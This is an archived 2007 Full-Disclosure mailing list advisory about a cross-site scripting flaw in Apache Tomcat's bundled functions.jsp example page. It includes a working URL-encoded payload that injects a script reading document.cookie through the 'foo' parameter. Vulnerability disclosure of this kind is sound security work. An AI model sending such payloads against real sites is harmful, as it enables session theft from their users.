[Full-disclosure] Apache Tomcat remote xss
handrix cobra
handrix at gmail.com
Thu Sep 6 03:16:15 BST 2007
Apache Tomcat remote xss
Author: handrix
Contact: handrix_at_morx_dot_org
Vulnerability: Cross Site Scripting
Severity: Medium/High
MorX security research team
www.morx.org
Description:
Tomcat provide many example of jsp file, servlet and others.
functions.jsp script is vulnerable to cross-site scripting attacks in foo
parameter.
XSS Vector:
http://server:port/jsp-examples/jsp2/el/functions.jsp?foo=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
Vulnerable versions :
Apache Tomecat/5.2.28 and may be others
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070906/aff5175e/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.